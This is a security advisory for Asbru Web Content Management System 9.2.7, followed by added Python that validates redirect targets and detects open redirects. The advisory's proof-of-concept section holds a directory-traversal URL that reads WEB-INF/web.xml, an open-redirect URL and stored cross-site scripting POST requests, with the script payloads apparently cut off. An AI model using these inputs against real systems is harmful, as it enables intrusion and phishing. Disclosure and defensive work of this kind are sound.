Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site
Request Forgery, Stored Cross-Site Scripting, Open Redirect and Information
Disclosure.

Tested on: Apache Tomcat/5.5.23
           Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                             @zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php

09.03.2016

--


#1 Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml


#2 Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk


#3 Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------


#4 Stored Cross-Site Scripting:
----------------------------

a)

POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygqlN2AtccVFqx0YN

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

">
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension=">
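Added example for the open redirect in #2 (login_post.jsp?url=...). This is illustrative code written for this page; it is not Asbru's code and not part of the ZSL-2016-5314 advisory. It shows the same-origin validation a redirect parameter needs in order to close the issue, and the check a tester applies to the response of the PoC URL to confirm it. APP_ORIGIN reuses the advisory's test host 10.0.0.7; the function names and the sample responses in the block are constructed, not captured from an Asbru install.

```python
# Same-origin redirect validation (fix side) and an off-origin redirect
# detector (test side) for an open redirect such as login_post.jsp?url=...
# Example code added to this page; not Asbru's code, not from the advisory.

from urllib.parse import urlsplit

APP_ORIGIN = "http://10.0.0.7"   # assumption: the CMS is served from one origin
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def is_safe_redirect(target, origin=APP_ORIGIN):
    """True only if `target` keeps the browser on `origin`.

    Accepted: absolute-path references ("/webadmin/") and absolute http(s)
    URLs whose scheme and host[:port] equal `origin`.
    Rejected: other hosts, scheme-relative "//host", backslash variants
    ("/\\host", which browsers read as "//host"), userinfo tricks
    ("http://10.0.0.7@evil/"), non-http(s) schemes such as javascript:,
    and any control character or whitespace (browsers strip tabs and
    newlines, so "ht\\tp://evil" would otherwise get past a parser).
    """
    if not target:
        return False
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False
    # Browsers treat "\" as "/" in the scheme/authority part; normalise first
    # so the check sees what the browser will see.
    normalised = target.replace("\\", "/")
    if normalised.startswith("/"):
        # Local absolute path, unless it is a network-path reference "//host".
        return not normalised.startswith("//")
    parts = urlsplit(normalised)
    want = urlsplit(origin)
    if parts.scheme.lower() not in ("http", "https"):
        return False          # also rejects bare "evil.com/x" (no scheme)
    return (parts.scheme.lower() == want.scheme.lower()
            and parts.netloc.lower() == want.netloc.lower())


def redirect_target(requested, fallback="/"):
    """What a login handler should do with its url parameter: honour it only
    when it passes is_safe_redirect, otherwise send the user to a fixed
    local page."""
    return requested if is_safe_redirect(requested) else fallback


def redirects_off_origin(status, location, origin=APP_ORIGIN):
    """Tester-side check for the PoC: does this response send the browser to
    another origin? `location` is the Location header value (None if absent)."""
    if status not in REDIRECT_STATUSES or not location:
        return False
    return not is_safe_redirect(location, origin)


if __name__ == "__main__":
    # Constructed responses: the first is what the PoC URL produces on a
    # vulnerable build (url= reflected verbatim), the others are benign.
    samples = [
        (302, "http://www.zeroscience.mk"),
        (302, "/"),
        (200, None),
    ]
    for status, location in samples:
        verdict = "OPEN REDIRECT" if redirects_off_origin(status, location) else "ok"
        print(f"{status} Location={location!r}: {verdict}")
```

The validator deliberately compares the full netloc (host and port) and only whitelists http(s), so a target like http://10.0.0.7:8080/ or http://10.0.0.7.attacker.example/ is refused along with the zeroscience.mk PoC value; an application that legitimately redirects to several hosts should keep an explicit allowlist rather than loosen the comparison.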